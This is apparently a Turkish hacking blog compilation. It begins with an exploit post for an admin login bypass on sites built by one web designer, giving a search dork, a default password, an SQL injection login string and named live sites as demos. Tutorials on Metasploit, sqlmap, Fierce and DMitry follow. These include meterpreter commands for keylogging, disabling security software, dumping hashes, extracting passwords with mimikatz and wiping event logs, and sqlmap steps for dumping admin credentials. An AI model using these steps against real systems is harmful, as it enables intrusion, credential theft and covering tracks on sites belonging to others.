-->

Zamikinfotech Admin Login Bypass

#################################################################################
# Exploit Title: Designed By zamikinfotech.in™ Admin Login Bypass
# Author : Sipahiler / TURKZ.org
# Google Dork : Designed By zamikinfotech.in™
# Tested on : Kali Linux
# Data : 2017-06-01
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################


Tutorial :

[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: 12345

OR

[+] Username: '=' 'or'
[+] Password: '=' 'or'

Demo :
http://dupattaworld.in/admin/
http://www.mutejeans.com/admin/login.php
https://cxsecurity.com/issue/WLB-2017060046
http://www.turkz.org/Forum/konu/designed-by-zamikinfotech-in™-admin-login-bypass.2837

Kali Linux Metasploit Kullanimi

Selamun Aleyküm ...

TEMEL METASPLOİT KULLANİMİ

HAKKİNDA

Metasploit Rapid7 Firmasinin Çok Önemli Bir Güvenlik Yazilimidir. Metasploit, Güvenlik Açıkları Hakkında Bilgi Verip Bu Açıklara Sızmaya Yardımcı Olan Bir Yazilimidir..  Ruby İle Yazilmiş Olan İçerisinde Exploitler, Payloadlar, Auxilliary'ler Ve Encoderlerin Buludunduğu Frameworkdur.

Veritabani Olarak Postgresql Kullanmaktadir. Kali Linux İçerisinde Hazır Kurulu Olarak Gelmektedir.
Terminalde Msfconsole Yazarak Komut Satirinda Ve Grafiksel Olarak Armitage İle Kullanılabilir.
Metasploit İçinde Nmap Taramasıda Yapılabilmektedir.

TERİMLER : 

Vulnerability: Türkçede Zayiflik Anlamina Gelen Sistemde Bulunan Açıklıktir.

Auxiliary: Sizma Öncesi Sistem Hakkinda Bilgi Toplamak İçin Bulunan Ek Modüller.

Exploit : Türkçesi Sömürmek Olan Sistem Açıklığından Faydalanarak Sisteme Sizmamizi Sağlayan Bileşendir.

Payload : Sisteme Sizdiktan Sonra Sistemde İstediklerimizi Yapmamizi Sağlayan Bileşendir.

Shellcode: Exploitin İçinde Bulunan Zararli Kod Parçalaridir.

Encoder: Exploiti Antivirüs, IDS, IPS, Ve Firewall'dan Geçiren Bileşendir.

GİRİŞ : 
İlk Olarak Terminal Açıp :
service postgresql start Yazarak Postgresql Veritabanini Başlatıyoruz.
msfconsole Yazarak Metasploitimizi Açıyoruz.


Help Komutu İle Metasploitin Tüm Komutlarını Ve Parametreleri Açıklamariyla Birlikte Görebiliriz Ama İngiliççe.



Search: Search Komutu Aranan Exploit, Payloads, Cve Numarasi Yada Genel Bi İfade İle Kullanılır.

Show Komutu : İstenilen Bileşenleri Listeleyip Görmemizi Sağlar.

Show Exploits: Metasploit Üzerindeki Tüm Exploitleri Gösterir.

Show Paylods: Metasploit Üzerindeki Tüm Payloadslari Gösterir.

Show Targets : Bulunan Target (Hedef)leri Gösterir.

Show Options : Exploit Yada Payloadin Tüm Ayarlarini Gösterir.

Use Komutu : İstenilen Exploiti Payloadı Seçmek İçin Kullanilir

set Komutu : Bir Değişkene Değer Aktarmak İçin Kullanilir.
Örnek : set RHOSTS Kurban İp Adresi
set LHOST Kendi İp Adresimiz

setg Komutu: Değişkenlere Global Olarak Değer Atar. Bir Başka Bi Exploit Yada Payload'ta O Ayarlar İçin Tekrar Değer Girmeniz Gerekmez.
Örnek : set RHOSTS Kurban İp Adresi'ne Global Değer Atar
set LHOST Kendi İp Adresimiz'e Global Değer Atar

Unset Komutu : Değişkene Atanan Değerleri İptal Eder.
unset RHOST Hedef İp Adresini İptal Eder
unset LHOST Local İp Adresimizi İptal Eder

Exploit Ve Run Komutu : Eğer Bir Exploit Seçmiş Ve İstenilen Ayarlari Yaptıktan Sonra Exploit Diyerek Çalıştırılır. Eğer Bir Payload Seçmişsek İstenilen Ayarlari Girdikten Sonra Run Denir Ve Payload Çalişir.

Giriş Kısmında Nmap Taraması Yapabilecegindende Bahsetmiştim Bi Hedef Üzerinde Tarama Yapıp Metasploit Üzerinde Yukarıda Açıklamasını Yaptıgımız Parametrelerle Exploit Etmeye Çalışalım.

db_nmap -Ss -sV -top-ports 10 81.169.145.159
--sS : Syn Taramasi
-sV : Versiyon Bilgisi
-top-ports 10 = En Çok Kullanılan 10 Portu Tara

Açık Portlar Ve Versiyon Bilgileri Geldi.
Metasploitte Search ftp Komutunu Bı Aratalim Bakalım Ftp İle İlgili Neler Varmiş 

Gözüme Çarpan Ftp Anonymous Girişi Oldu Bı Test Edelim.
1. use auxiliary/scanner/ftp/anonymous Komutu İle Seçiyoruz
2. show options Komutuyla Anonymous Ftp Ayarlarına Bakıyoruz.
3. set FTPPASS anonymous Komutu İle Ftp Passwordu Belirtiyoruz
4 .set RHOST Hedef İp Adresi İle Hedef İpi Yazıyoruz
5. Tekrar Show Options Komutuyla Bakalım Ayarlarımız Değişmiş Mi ?
6.Ardından Exploit Yada Run Diyoruz.


Anon Giriş Yaptığı İçin Yetkiler Kısıtlı.

Bir Sistemde Exploit Çalıştirilip Meterpreter Satirina Düştükten Sonra Meterpreter Komutları Kullanılır, Meterpreter Metasploitin En Çok Kullanılan Payloadlarindan Biridir. Onlardan Bazılarını Yazacagım.

Sysinfo : Sistem Hakkinda Bilgi Verir.
getuid: Sisteme Hangi Yetkilerle Erişim Sağladıgimizi Verir.
getpid: Sistem PID Numarasini Getirir.
ipconfig -a : Sistem Network Bilgilerini Verir.
run checkvm: Hedef Makinanin Sanal Makina Olup Olmadığına Bakar.
run keylogrecorder: Hedef Sistemde Keylogger Başlatir.
run getgui -e : Hedef Sistemde RDP (Remote Desktop Protokol) Açar.
run getcountermeasure: Hedef Sistemdeki Güvenlik Programlarini Devre Dişi Kılar.
backgraund: Aktif Oturumu Arka Plana Alır.
ps: Süreçleri Gösterir.
kill PID : PID Numarali Süreci Öldürür.
download: Hedeften Dosya İndirmek İçin Kullanilir.
migrate: Güvenilir Bir Process'e Geçiş İçin Yapmak İçin Kullanilir.
hashdump: Sistem Üzerinden Bulunan Parola Dumplarini Çeker.
shell: Hedef Sistemin Komut Satirina Geçmemize Yarar.
load mimikatz: Sisteme Mimikatz Yüklenir.
mimikatz_command -f sekurlsa::searchPasswords: Bellekteki Şifreleri Getirir.
clearev: Event Loglarini Temizler.
run event_manager -c : Tüm EventLoglarini Silmenizi Sağlar.

Bi Çok Meterpreter Komutu Var Bunlardan Çok Kullanılanları İşinize Yarayacak Olanlara Değinmeye Çaliştim.

Umarim Anlaşılir Bi Döküman Olmuştur Farkli Kaynaklardan Sizler İçin Derledim Topladim

Selametle TrazeR Sunar //

Sqlmap Kullanimi

Selamun Aleyküm ...

Akademi İçin Çektigim Genel Sqlmap Kullanimi,
Daha İyi Anlamanız İçin İşlemleri Numaralandırdım.



Dork Taramasi için:
1 : sqlmap.py  -g "index.php?id=" 

Veritabani Çekmek için :
2: sqlmap.py -u   "http://www.example.com/media.php?id=26"  --dbs
Veritabanındaki Tabloları Çekmek İçin : 
3: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı --tables 
Kolanları Çekmek İçin :
4: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı --columns 
Admin Bilgilerini Çekmek İçin
5: sqlmap.py -u http://www.hedefsite.com/sqlacık=1 -D Veritabanı_Adı -T Tablo_Adı -C Kolon_Adı Admin,id,pass --dump


Ne Kadar Kısa Tutmaya Çalışsamda Video Uzadi 
Hd İzleyin


Umarım Anlaşılır Ve Yararli Olur.

Kali Linux Fierce

Selamun Aleyküm ..

Fierce Rsnake Diliyle Yazılmış Büyük Bir Scriptdir. Fierce Dns Enumeration İçin Linux Dağıtımlarındanda Kullanılan Bir Araçtır. Bi Şirket Ağındaki İç Ve Dış IP Adreslerini Tespit Etmede, Hızlı Bir Şekilde Domain Taramalarında Kullanıllır. Ayrıca Zone-Transfer, Dns Brute-Force Denemeleride Yapabilir.

Komut Satırından Fierce -h Yazarak Araç Ve Parametreler Hakkında Bilgi Alalim.


Usage KIsmında Örnek Olarak Kullanımını Gösteriyor.
Genel Kullanım Sekli : fierce -dns example.com

-dns : Bu Parametre İstediğimiz Domainin Subdomain Ve İp Adreslerini Görebiliriz. Yani Domain Taraması Yapar. Örnek: fierce -dns mcdonlds.com

-version : Bu Parametre İle Sitenin Versiyonunu Tespit Edebiliriz.
Örnek: fierce -version mcdonlds.com

-dnsserver : Parametreyle Sorguları Hangi Server Üzerinden Yapacağımızı Belirtiriz.

-dnsfile : Dns Brute-Force İçin Ön Ek Dosyasi.

-wordlist : Bu parametreyle Tarama Yaparken Word List Eklememize Yarar.
Örnek: fierce -dns mcdonlds.com -wordlist sözlük.txt İlk Önce Zone-Transfer Deniyor Eğer Başarılı Olmazsa Wordlist İle Belirtilen Dosya İle Brute-Force Yapiyor.

-range : IP Aralığı Belirtmeye Yarar. Mesela : fierce -range 12.33.333.4-255 -dnsserver 212.30.2.1 Burada 212.30.2.1 Serverında 12.33.333.4.0 İle 12.33.333.4.255 IPleri Arasında Tarama Yapılır.

-search : Range İle Verilen IPler Tarandığında Farklı Sunucularla Karşılaşılabilir Bu Sunucularıda Taratmak İçin Bu Parametreyi Kullanıyoruz.

Herhangi Bi Transfer Gerçekleştiremediğini Belirtti.
Kullanım Parametrelerini Deneyerek Daha Iyı Anlarsiniz.

Fierce Aracının Genel Kullanımi Bu Şekildedir

TrazeR Sunar //

Kali Linux DMitry

Selamun Aleyküm...

DMitry Paket Açıklaması

DMitry (Deepmagic Information Gathering Tool), C'de Kodlanmış Bir UNIX / (GNU) Linux Komut Satırı Uygulamasıdır. DMitry, Bir Hedef Hakkında Mümkün Olduğunca Çok Bilgi Toplayabilir. Temel İşlevsellik, Olası Alt Alanlar, E-posta Adresleri, Çalışma Zamanı Bilgileri, TCP Portu Taraması, Whois Aramaları Ve Daha Fazlasını Toplayabilir.

Terminalde dmitry Yazılarak Açılır:

Usage Kısmında Aracın Nasıl Kullanılacağı Gösteriyor:
Usage: dmitry [-winsepfb] [-t 0-9] [-o %host.txt] host
Buradaki Parametreleri Açıklamak Gerekirse ; 

-o Tarama Çıktısını Host.txt Dosyasına Veya -o Parametresiyle Belirtilen Dosya/Dizin'e Kayıt Eder.
-i Parametresi Bir Ana Bilgisayarin İP Adresinde Whois Aramasi Gerçekleştirir.
-w Parametresi Ana Makinanin Etki Alani Adına, Bir Whois Taramasi Gerçekleştirir.
-n Parametresi Netcraft.com Tarama Sonuçlarını Almak İçin Kullanilir.
-s Parametresi Olası Alt Alan Adlarini Tarar.
-e Parametresi Olası E-Posta Adreslerini Tarar.
-p Parametresi Hedef Adresde TCP Bağlantı Noktalarını Tarar Port Taraması Yani.
*-f Parametresi Bir Ana Bilgisayarda Çıktı Bildiren Filtrelenmiş Bağlantı Noktalarini Gösterir
*-b Parametresi Taranan Bağlantı Noktasından Alınan Afişi Okur
*-t Parametresi 0-9 TCP Bağlantı Noktasını Tararken TTL'yi Saniye Cinsinden Ayarlar (Varsayılan 2)
Genel Olarak Google Üzerinde Bi Tarama Yapalım :
dmitriy www.google.com

Bazı Önemli Bilgileri Ns Kayıtları Vs Arayak Buldu. 
Şimdi Başka Bi Sitede Alt Alan Adlarını, Açık Ve Filtrelenmiş Portlari Tarayalim -o Parametresiyle Desktopa Kayıt Edelim : 

dmitry -spf http://www.hedefsite.com -o /root/Desktop/sonuc

Bilgi Toplamada Gerçekten İşe Yarıyan Güzel Bi Araçtır Tavsiye Ederim.

TrazeR Sunar //

Edit: Resim Boyutları İçin Kusura Bakmayin Linuxda Düzenleyemiyorum.